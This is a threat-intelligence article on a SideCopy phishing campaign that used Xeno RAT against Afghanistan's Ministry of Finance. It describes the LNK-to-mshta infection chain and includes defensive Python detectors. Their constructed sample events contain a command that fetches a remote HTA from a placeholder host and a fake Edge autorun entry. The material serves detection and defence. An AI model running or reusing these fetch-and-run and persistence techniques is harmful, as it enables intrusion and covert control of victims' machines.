Researchers at Seqrite Labs have disclosed details of a targeted phishing campaign against Afghanistan’s Ministry of Finance, provincial revenue and finance departments, and Pashto‑speaking government employees. According to the researchers, the attack is likely conducted by the Pakistani group SideCopy, which is using the open‑source remote access trojan Xeno RAT version 1.8.7. The campaign has been codenamed Operation XENOFISCAL. Public‑sector organizations in Afghanistan and South Asia should immediately inspect their infrastructure for signs of compromise and strengthen filtering of incoming attachments.
Infection chain: from ZIP archive to full control
As Seqrite Labs researcher Dikshit Panchal reports, the attack begins with the delivery of a ZIP archive containing a malicious Windows shortcut (LNK file) whose name is in Pashto — the primary language used for official paperwork in Afghan government agencies. The choice of language indicates the attackers’ deep familiarity with the target environment.
The technical infection chain is structured as follows:
- When executed, the LNK file invokes the system utility mshta.exe to download a remote HTA (HTML Application) file from a compromised domain belonging to an Afghan educational institution.
- The HTA file runs obfuscated JavaScript code directly in memory, minimizing artifacts left on disk.
- The malware achieves persistence in the system via the Windows registry, disguising itself as a Microsoft Edge process.
- Using a DLL‑based loader, Xeno RAT 1.8.7 is installed, and a decoy document is displayed to the user as a distraction.
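Two of the steps above leave telemetry a defender can match on: mshta.exe launched with a remote URL on its command line, and an autorun registry value that calls itself Microsoft Edge while pointing somewhere other than Edge's install directory. The following detection logic is an added example written for this page, not code from Seqrite Labs or from the campaign. The event records are constructed to resemble Sysmon process-creation (Event ID 1) and registry-value-set (Event ID 13) events; the hostnames, SIDs and paths in them are made up, and the whitelist of Edge install directories is an assumption about a default Windows installation.

```python
"""Detection checks for the mshta.exe and registry steps of the chain above.
Added example; events below are constructed, not taken from the campaign."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample telemetry. Field names follow the Sysmon schema
# (Image, CommandLine, ParentImage, TargetObject, Details); values are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://edu.example.invalid/update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\LegacyApp\legacy.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\LegacyApp\ui.hta"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "Details": r"rundll32.exe C:\Users\user\AppData\Roaming\Edge\msedge.dll,Start"},
    {"EventID": 13, "Image": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_A",
     "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
# Assumed default install locations of Edge and its updater (lower-cased for matching).
EDGE_INSTALL_DIRS = (
    r"c:\program files (x86)\microsoft\edge",
    r"c:\program files\microsoft\edge",
    r"c:\program files (x86)\microsoft\edgeupdate",
    r"c:\program files\microsoft\edgeupdate",
)


@dataclass
class Finding:
    rule: str
    detail: str


def detect_remote_hta(ev: dict) -> Optional[Finding]:
    """Flag mshta.exe whose command line references a remote URL.
    A local HTA path (the LegacyApp event) is a legitimate, if rare, use and is not flagged."""
    if ev.get("EventID") != 1:
        return None
    if not ev.get("Image", "").lower().endswith(r"\mshta.exe"):
        return None
    m = REMOTE_URL.search(ev.get("CommandLine", ""))
    if not m:
        return None
    return Finding("mshta_remote_hta",
                   f"mshta.exe fetched {m.group(0)} (parent {ev.get('ParentImage')})")


def detect_edge_masquerade(ev: dict) -> Optional[Finding]:
    """Flag Run/RunOnce values that mention Edge but whose command does not
    reference a binary under Edge's installation directories."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    details = ev.get("Details", "").lower()
    if not RUN_KEY.search(target):
        return None
    value_name = target.rsplit("\\", 1)[-1]
    if "edge" not in value_name.lower() and "edge" not in details:
        return None
    if any(d in details for d in EDGE_INSTALL_DIRS):
        return None  # genuine Edge autorun entry
    return Finding("edge_masquerade_autorun", f"{value_name} -> {ev.get('Details')}")


def scan(events) -> list:
    """Run every rule over every event and collect the findings in event order."""
    findings = []
    for ev in events:
        for rule in (detect_remote_hta, detect_edge_masquerade):
            f = rule(ev)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Run against the constructed events, the first and third records are flagged and the two legitimate ones (a local HTA and the real Edge autorun) pass. In production the same rules would be expressed in the SIEM's query language, but the two conditions, remote URL on an mshta.exe command line and an Edge-named Run value outside Edge's install path, are the substance of the alert.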
Capabilities of Xeno RAT
Xeno RAT is an open‑source remote access trojan that communicates with its command‑and‑control server over the TCP protocol. According to the researchers, version 1.8.7, observed in this campaign, offers a broad feature set:
- Download and execution of external DLL modules
- Keystroke logging and screen capture
- Clipboard monitoring
- Access to webcam and microphone
- File operations and data exfiltration to the server
- Network tunneling via a SOCKS5 proxy
- Collection of information about installed antivirus solutions
- Creation of scheduled tasks for automatic startup
- Removal of persistence mechanisms and self‑deletion
The combination of antivirus reconnaissance with SOCKS5 tunneling indicates that the operators purposefully adapt their tactics to the victim’s security controls and use compromised hosts as intermediate nodes for traffic proxying.
Threat context: SideCopy and Transparent Tribe
According to the researchers, SideCopy is a group presumed to be linked to Pakistan and operating within the broader structure of Transparent Tribe (also known as APT36). It should be noted that this attribution is based on a single research source and has not been independently confirmed.
The Operation XENOFISCAL campaign is viewed as part of a wider cluster of malicious activity targeting government entities in South Asia. In April 2025, the same group was reportedly linked to attacks on various sectors in India using Xeno RAT, Spark RAT, and CurlBack RAT.
In parallel, reports emerged of a separate phishing operation aimed at Indian military infrastructure. In this campaign, according to unverified information, malicious Linux .desktop files were distributed via WhatsApp using lures related to armored vehicle procurements. The infection chain resulted in deployment of a Go‑based implant referred to as DeskRAT. However, these details are based on a single publication and require independent verification.
Impact assessment
The primary risk group comprises Afghan government financial institutions, including the Ministry of Finance, provincial revenue and finance departments, and individual officials working with Pashto‑language documents. Compromise of financial authorities could lead to the leakage of budgetary data, information on international transactions, and internal correspondence.
The use of a compromised domain of an educational institution as an intermediate delivery node indicates that the infrastructure of Afghanistan’s education sector may also be compromised and requires auditing.
Protection recommendations
- Block execution of mshta.exe via AppLocker or Windows Defender Application Control policies on workstations where this utility is not required for business processes.
- Attachment filtering: configure mail gateways to block ZIP archives containing LNK files. This is one of the most common delivery vectors in targeted attacks.
- Registry monitoring: track the creation of suspicious autorun keys, especially those masquerading as Microsoft Edge processes.
- Network traffic control: detect anomalous TCP connections and SOCKS5 tunnels originating from workstations that are not expected to initiate such traffic.
- Audit of scheduled tasks: check for unusual tasks in the Windows Task Scheduler that could be used by Xeno RAT for persistence.
- Staff awareness training: provide targeted training for staff in financial agencies on the risks of opening ZIP attachments containing LNK files, especially those received from unknown senders.
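The attachment-filtering recommendation is straightforward to implement at a gateway, provided the check does not rely on file extensions alone. The script below is an added example written for this page, not a product's filter or the researchers' tooling. It opens a ZIP attachment, flags any entry that is a Windows shortcut either by its .lnk extension or by the Shell Link header (HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046), so a shortcut renamed to .pdf is still caught, and descends into nested archives up to a fixed depth. The sample archive it builds is constructed inline; the file names in it are invented.

```python
"""Gateway-style check: does a ZIP attachment carry a Windows shortcut (LNK)?
Added example; the sample archive is constructed, not a real attachment."""
import io
import zipfile

# Shell Link header: HeaderSize 0x0000004C, then LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk little-endian layout.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C0000000" "00000046")
ZIP_LOCAL_HEADER = b"PK\x03\x04"
MAX_DEPTH = 3  # how many levels of nested archives to inspect


def looks_like_lnk(data: bytes) -> bool:
    """True when the first 20 bytes are the Shell Link header, whatever the name."""
    return data[:len(LNK_MAGIC)] == LNK_MAGIC


def find_shortcuts(zip_bytes: bytes, depth: int = 0, prefix: str = "") -> list:
    """Return the paths of every shortcut entry; nested archives are joined with '!'.
    Unreadable input is treated as containing nothing (callers may choose to block it anyway)."""
    hits = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return hits
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))  # only the header is needed
            if info.filename.lower().endswith(".lnk") or looks_like_lnk(head):
                hits.append(path)
            elif head[:4] == ZIP_LOCAL_HEADER and depth < MAX_DEPTH:
                hits.extend(find_shortcuts(zf.read(info), depth + 1, path + "!"))
    return hits


def should_block(zip_bytes: bytes) -> bool:
    return bool(find_shortcuts(zip_bytes))


def build_sample() -> bytes:
    """Constructed attachment: a benign text file, an obvious .lnk, a shortcut
    renamed to .pdf, and a nested archive holding one more shortcut."""
    fake_lnk = LNK_MAGIC + b"\x00" * 56  # header only; enough for the check
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("invoice/statement.lnk", fake_lnk)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("readme.txt", b"budget figures attached")
        z.writestr("Q3 report.lnk", fake_lnk)
        z.writestr("scan.pdf", fake_lnk)
        z.writestr("archive.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    verdict = "block" if should_block(sample) else "allow"
    print(verdict, find_shortcuts(sample))
```

The header check is what makes the filter worth deploying: an extension rule alone is defeated by renaming, while a shortcut that Windows will actually execute must start with this header. Encrypted archives cannot be inspected this way and are usually quarantined as a matter of policy.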
Organizations operating in the public sector of Afghanistan and South Asia are advised to prioritize checking workstations for atypical HTA downloads via mshta.exe, suspicious registry keys impersonating Microsoft Edge, and outbound TCP connections exhibiting signs of SOCKS5 tunneling. If any of these indicators are detected, the host should be isolated and a full incident investigation carried out.